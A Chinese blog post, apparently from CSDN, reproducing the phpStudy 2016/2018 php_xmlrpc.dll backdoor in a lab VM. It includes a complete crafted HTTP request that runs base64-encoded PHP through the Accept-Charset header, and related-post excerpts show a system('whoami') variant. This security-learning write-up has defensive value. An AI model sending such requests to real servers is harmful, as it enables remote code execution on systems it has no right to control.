记一次phpstudy后门漏洞复现

最新推荐文章于 2024-07-26 10:02:51 发布
原创 最新推荐文章于 2024-07-26 10:02:51 发布 · 1.7k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#phpstudy #后门 #脚本

本文详细记录了phpStudy后门漏洞的复现过程,重点在于2016和2018版本中extphp_xmlrpc.dll模块内存在的后门代码。通过检查动态链接文件并搜索敏感函数eval,发现可以执行命令。利用Burp Suite抓包并修改请求头,通过base64编码的命令验证了漏洞的存在。同时提到了GitHub上的相关脚本资源。

通过查阅资料,后门代码存在于\ext\php_xmlrpc.dll模块中
phpStudy2016和phpStudy2018自带的php-5.2.17、php-5.4.45
phpStudy2016路径
php\php-5.2.17\ext\php_xmlrpc.dll
php\php-5.4.45\ext\php_xmlrpc.dll
phpStudy2018路径
PHPTutorial\php\php-5.2.17\ext\php_xmlrpc.dll
PHPTutorial\php\php-5.4.45\ext\php_xmlrpc.dl

网上下载后门版本,我这里用的是2016版本
查看phpstudy下的php\php-5.2.17\ext\php_xmlrpc.dll动态链接文件
搜索敏感函数eval 发现的确存在在这里插入图片描述
现在我们来验证一下
用burp抓取访问本机ip地址包,添加
accept-charset: IHBocGluZm8oKTs=(这个是执行的命令,用base64编码的)
Upgrade-Insecure-Requests: 1
注意:
这里gzip,deflate中间开始有空格,要去掉;
末尾回车额外添加一行空行
利用成功

GET / HTTP/1.1
Host: 192.168.31.132
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:41.0) Gecko/20100101 Firefox/41.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
accept-charset:IHBocGluZm8oKTs=
Upgrade-Insecure-Requests: 1
Connection: close
Content-Length: 4

以上是改包的完整代码

最后附上github上大佬写的脚本
phpstudy命令执行脚本

phpStudy后门漏洞复现
LuckySec
08-20 7590
0x01 漏洞简介 2019年9月20日,网上传出 phpStudy 软件存在后门,随后作者立即发布声明进行澄清,其真实情况是该软件官网于2016年被非法入侵,程序包自带PHPphp_xmlrpc.dll模块被植入隐藏后门,经过分析除了有反向连接木马之外,还可以正向执行任意php代码。 影响版本: phpStudy2016-php-5.2.17 phpStudy2016-php-5.4.45 phpStudy2018-php-5.2.17 phpStudy2018-php-5.4.45 更多漏洞细节
phpstudy后门漏洞复现
1stPeak's Blog
03-31 1624
前言 如果服务器是用phpstudy2016或phpstudy2018搭建的,那么就有可能存在后门 发现漏洞 后门代码在phpStudy2016和phpStudy2018的php-5.2.17php-5.4.45的\ext\php_xmlrpc.dll文件中 只要该文件中可以搜索到@eval(%s(‘%s’)),即证明漏洞存在 phpStudy2016路径 php\php-5.2.17...
phpstudy php_xmlrpc.dll后门漏洞复现
https://www.cnblogs.com/zpchcbd/
09-26 7309
搭建环境: phpstudy2018 php版本5.4 漏洞影响版本:5.2/5.4 漏洞利用 1、随便访问一个存在的php文件 我这里就访问index.php好了 2、进行index.php 进行抓包 再自行添加两个字段payload 执行系统命令 Accept-Charset: ZWNobyBzeXN0ZW0oJ3dob2FtaScpOw== Accept-Encoding: gzip,def...
phpstudy后门利用复现
Sys1em32 安全之路
09-26 924
0x01.简介 Phpstudy软件是国内的一款免费的PHP调试环境的程序集成包,通过集成Apache、PHP、MySQL、phpMyAdmin、ZendOptimizer多款软件一次性安装,无需配置即可直接安装使用。 0x02.漏洞描述 phpstudy近期被爆存在有人恶意植入后门,相关大佬已经被请去喝茶了。 后门存在路径: phpStudy2016和phpStudy2018自带的php...
【渗透测试】phpstudy后门利用复现
一个偶尔更新,有点神经质的开发人员,专注于网络安全和人工智能应用领域。
11-03 3726
目录一、漏洞描述二、漏洞影响版本三、漏洞RCE 一、漏洞描述 Phpstudy软件是国内的一款免费的PHP调试环境的程序集成包,通过集成Apache、PHP、MySQL、phpMyAdmin、ZendOptimizer,多款软件一次性安装,无需配置即可直接安装使用,具有PHP环境调试和PHP开发功能,在国内有着近百万PHP语言学习者、开发者用户。2018年被爆出存在后门。 漏洞环境自行搭建。 本博客仅学习使用。 二、漏洞影响版本 phpStudy2016 php\php-5.2.17\ext\php_xml
phpStudy backdoor 2019后门漏洞复现过程
牛奶栗的小博客
11-11 1062
1)可以通过查看路径为PHPTutorial/php/php-5.4.45/ext/php_xmlrpc.dll的文件,查找到@eval(%s('%s'));4、打开Burpsuite抓phpinfo.php页面的请求包,发送到Repeater重放器模块。部署在win10虚拟机里,解压后运行后访问localhost/phpinfo.php即成功安装。3)查看php.ini文件,检索到extension=php_xmlrpc.dll。2)查看php探针→PHP已编译模块检测,存在xmlrpc。
【漏洞复现phpstudy隐藏后门漏洞的验证与利用
kkza的博客
09-18 1740
1 背景 phpstudy是国内第一款php后端开发调试集成软件,其将php、apache、mysql、phpmyadmin等集成在一起一次性安装,使用者无需在配置上面花太多时间。 2019年杭州警方在净网2019行动后发布了phpstudy存在隐藏后门的漏洞 2影响版本 phpstudy2016 --php/php-5.2.17/ext/php_xmlrpc.dll --php/php-5.4.45/ext/php_xmlrpc.dll phpstudy2018 --PHPTutoria.
phpStudy漏洞复现
好好学习,天天向上
02-05 236
漏洞简介 关于phpStudy后门漏洞可参考https://blog.csdn.net/weixin_43886632/article/details/101294081 phpStudy在下列文件中存在后门 phpStudy2016 php\php-5.2.17\ext\php_xmlrpc.dll php\php-5.4.45\ext\php_xmlrpc.dll phpStudy2018...
RCE漏洞:phpstudy漏洞复现
一个努力学习网安的小牛马
10-16 822
phpstudy中存在一种RCE漏洞(Remote Code|Command Execute)由于程序中预留了执行代码或者命令的接口,并且提供了给用户使用的界面,导致被黑客利用, 控制服务器。
phpstudy后门预警及漏洞复现
热门推荐
ranuy阮的博客
09-24 1万+
1.phpstudy介绍 Phpstudy是国内的一款免费的PHP调试环境的程序集成包,其通过集成Apache、PHP、MySQL、phpMyAdmin不同版本软件于一身,一次性安装无需配置即可直接使用,具有PHP环境调试和PHP开发功能。 2.后门事件 2018年12月4日,西湖区公安分局网警大队接报案,某公司发现公司内有20余台计算机被执行危险命令,疑似远程控制抓取账号密码等计算机数据回传大量...
【漏洞复现phpStudy 小皮 Windows面板 RCE漏洞
李同學的安全圈
02-09 6170
Phpstudy小皮面板存在RCE漏洞,通过分析和复现方式发现其实本质上是一个存储型XSS漏洞导致的RCE。通过系统登录用户名输入处的XSS配合系统后台自动添加计划任务实现RCE。
phpstudy后门检验+复现
weixin_44897902的博客
09-28 417
最近phpstudy被爆出有后门,当时我还毫不在意,觉得自己不可能…然后,打脸 看着自己的phpstudy2018,数据库突然出问题,才发现自己已经成为别人的肉鸡好多年。。。 快来看看你的phpstudy有没有这样的后门吧 准备工作:win10虚拟机,phpstudy20181102,bp抓包工具 找到PHPTutorial\php\php-5.2.17\ext\php_xmlrpc.dll ...
复现phpstudy2018后门漏洞
p_utao的博客
11-30 602
影响版本 phpstudy 2016版php-5.4 phpstudy 2018版php-5.2.17 phpstudy 2018版php-5.4.45 后门分析 地址:C:\phpStudy\PHPTutorial\php\php-5.2.17\ext\php_xmlrpc.dll 本地复现 phpstudy版本 php版本 2018 5.2.17 大佬的exp GET /index.php HTTP/1.1 Host: yourip.com Cache-Control: max-
phpStudy远程RCE漏洞复现
weixin_43268670的博客
07-03 2260
大家好,刚刚来到csdn这个大家庭,以后准备把自己在网络安全的一些小知识录在此,希望能和大家好好交流。 需要的工具: VMware Workstation Pro Windows7的/ 2008R2 BurpSuiteFree phpStudy20161103.zip(文中使用)phpStudy20180211.zip Python ...
【漏洞复现phpStudy 小皮 Windows面板 存在RCE漏洞
最新发布
xt350488的博客
07-26 1168
如上图可以看到确实触发XSS弹窗,这是因为整个系统在加载的过程中会读取操作日志的内容,刚刚在用户名处插入的语句就是为了让系统操作日志进行录以便登录成功之后加载js代码脚本,所以执行显示了登录系统失败。这个时候我们再去访问这个php木马,这个时候就可以直接使用【蚁剑】连接,连接就不演示了(图不小心删了)此时你会发现你访问了这个php, 自动下载了这个文件,并没有执行,说明是纯静态的网页,我们也就使用。这个时候我们去网站后台看php版本,没有选择,选择指定的版本并保存就好。此时再输入正确的密码,成功弹窗。
PhpStudy后门漏洞实战复现
la-大白
10-28 5091
phpstudy后门漏洞
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值